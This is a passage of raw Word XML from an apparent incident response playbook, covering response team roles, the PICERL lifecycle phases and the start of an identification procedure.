          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:i w:val="1"/>
          <w:i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Why important?</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Their output answers: </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="09F12D96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What exactly happened? How? For how long?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="135A09EB" w14:textId="082BE651">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1.5 IT Support Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="54FD776F" w14:textId="372187D2">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Hands-on team for system changes.</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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="10479C3E" w14:textId="7537EF36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Host isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5CE85121" w14:textId="317D10B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Password resets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="61ECB55B" w14:textId="63BD061B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Applying patches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="1BE859CA" w14:textId="1D358992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Restoring systems from backups.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="728E9EE9" w14:textId="5D61EC11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Supporting the recovery phase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="38FDFE8B" w14:textId="1E2A7A77">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Why important?</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SOC analyzes — IT acts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="422FE332" w14:textId="33892AE5">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1.6 Communications Officer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="178ADA39" w14:textId="69DE081B">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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3BDEB206" w14:textId="16004763">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Internal communication with teams and management.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="0CE57B0C" w14:textId="21927A12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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External communication (customers, partners, media).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="76A392F9" w14:textId="47BA2B3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Ensures</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messaging is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accurate</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and controlled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7BF92B66" w14:textId="6673E0D2">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1.7 Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7DA7731F" w14:textId="700B01E2">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Responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5BDF0112" w14:textId="2E14527F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>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Approves major business or legal decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="581C22CC" w14:textId="02B6C4E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>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Provides budget, tools, and resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="40F73A52" w14:textId="0732E8D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>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Reviews final incident reports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="2A205357" w14:textId="25247711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5F3FC1CC" w14:textId="39E593F6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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2. Incident Response Lifecycle (PICERL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="04660D41" w14:textId="1F5E610B">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A structured model to handle incidents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step-by-step</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="422D4ED3" w14:textId="03AF23D7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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2.1 Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7A8C0D2F" w14:textId="68E0FCE0">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This phase determines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how ready the organization is</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before any incident occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="1032474A" w14:textId="2DFF6679">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Activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5201BF40" w14:textId="2A9493C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Develop policies (IRP, escalation procedures, communication plans).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="49E0DE9E" w14:textId="423D8006">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Deploy SIEM/EDR and configure logging (Sysmon, Firewall, AD logs).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="406FEBCF" w14:textId="428A0839">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Harden systems (CIS Benchmarks, disabling unused services).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="230E9AD9" w14:textId="788DF85B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Conduct staff training and simulations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5BC02051" w14:textId="2DAAACD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Validate the availability of clean backups.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="32049BDA" w14:textId="2E83CF0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Build the IRT structure and define roles.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="161E8E9F" w14:textId="7AFC3308">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Why this phase matters:</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Most incidents fail because the organization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wasn’t</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ready, not because the attack was too complex.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7331C47D" w14:textId="2753A53A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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2.2 Identification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="2B280FF7" w14:textId="52981A0F">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Goal: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Detect and confirm</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that an incident is happening.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="120D58D5" w14:textId="79048146">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Activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7C87DD34" w14:textId="37AAEC14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Analyze SIEM/EDR alerts for suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="0F29B2FC" w14:textId="6FA661AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Identify unusual patterns (failed logons, privilege escalation, process injections).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="68FD9282" w14:textId="3AB5159A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Validate IOCs (IPs, hashes, domains).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="439F3893" w14:textId="4A88499A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Determine how widespread the issue is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="35300D63" w14:textId="3A7A322E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Assign severity level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="02BF0AD1" w14:textId="61A25220">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Key questions L1/L2 answer:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="6E900156" w14:textId="1679DEF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>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What is happening?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5824972A" w14:textId="48A04878">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>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How do we know it’s real?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="017869B1" w14:textId="492A4A81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>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Which assets are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impacted</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="4F9E4169" w14:textId="132B4A20">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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2.3 Containment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="28133847" w14:textId="39DC48F5">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Goal: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Limit attacker movement and prevent further damage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="44F835AC" w14:textId="52077929">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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Short-Term Containment (Immediate Actions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7B17EAE1" w14:textId="698B0EA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Isolate affected hosts (EDR → Network Isolation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="31D40BC4" w14:textId="6929D20C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Kill malicious processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="511EA68A" w14:textId="3AB433D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Block C2 IPs/domains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="74FB28E9" w14:textId="77F7B5D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Temporarily disable vulnerable services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="38E642C1" w14:textId="35F09FFC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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Long-Term Containment (Stabilization)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5AC6E059" w14:textId="3F0905C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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Disable compromised accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="71DD2885" w14:textId="7881669B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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Reset passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="1D59BCBB" w14:textId="5FA3BB6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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Patch vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5E70754E" w14:textId="7E27FC62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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Apply temporary firewall/GPO rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="524420C2" w14:textId="6BC65DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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Add new detections to SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="53142F9C" w14:textId="3215C2DE">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Important Insight:</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Containment is not removal — it only stops the bleeding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="37A274E3" w14:textId="18862C94">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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2.4 Eradication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3EE78619" w14:textId="36F92319">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Goal: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Remove the attacker completely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="35086A7E" w14:textId="16AF0DE3">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Activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="13F0A621" w14:textId="1418EFF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Delete malware and any remnants.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3E31FC74" w14:textId="17966A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Remove persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5496608D" w14:textId="27425352">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Registry Run keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="4C2F3273" w14:textId="6016BD32">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Scheduled Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="41E2A673" w14:textId="3D97591F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Startup folders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="64D18C0A" w14:textId="65649452">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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WMI persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="53CFCAD6" w14:textId="11EC67FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Patch exploited vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5EA36BFB" w14:textId="26422EB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Clean affected files or reinstall OS if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="570173C8" w14:textId="6E814A36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>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Verify no malicious activity remains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="6934BB7F" w14:textId="0850E6C9">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Outcome:</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The environment becomes clean and safe to restore.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="2761E73D" w14:textId="233B4E8E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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2.5 Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3DFB2D4D" w14:textId="072D1689">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Goal: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Safely return systems to normal operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3A6C8B4B" w14:textId="72792ED1">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Activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3E147576" w14:textId="1F78D27A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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Restore from clean backups or golden images.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="185AC5F9" w14:textId="4A4447F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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Rebuild compromised servers if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3187F24C" w14:textId="2D386FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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Validate applications/services functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="4DA3FDBC" w14:textId="43349CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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Monitor logs and EDR events for 48–72 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="1C8FABAE" w14:textId="0F1829D9">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Why this matters:</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Recovery too early → reinfection.</w:t>
      </w:r>
      <w:r>
        <w:br/>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Recovery too late → business downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="131EF08D" w14:textId="7A48E967">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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2.6 Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="081A7C3F" w14:textId="13437202">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Goal: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Convert the incident into knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7B94D5B4" w14:textId="31A28F2A">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Activities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="21CA43B6" w14:textId="6D41C327">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Conduct review meeting (within 48 hours).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="0DE62DF5" w14:textId="5195C6F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Identify what worked / what failed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="4ECAA6E7" w14:textId="3EE47741">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Update policies, playbooks, and detection rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="28392556" w14:textId="115AD4B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Add new IOCs, TTPs, and YARA/SIEM rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="2ACFCB80" w14:textId="1DE8B00B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>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Document the full timeline and impact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="38C70E67" w14:textId="2E97DEB0">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This phase increases maturity more than any other step.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="4FCE63BC" w14:textId="031176C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="08E4391E" w14:textId="1728CF91">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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 xml:space="preserve">3. Incident Response Procedures (Practical,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48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step-by-Step)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="16CAA76E" w14:textId="229E9C94">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3.1 Identification Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3093D2C8" w14:textId="18A82B58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Receive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alert</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from SIEM/EDR.</w:t>
      </w:r>
    </w:p>
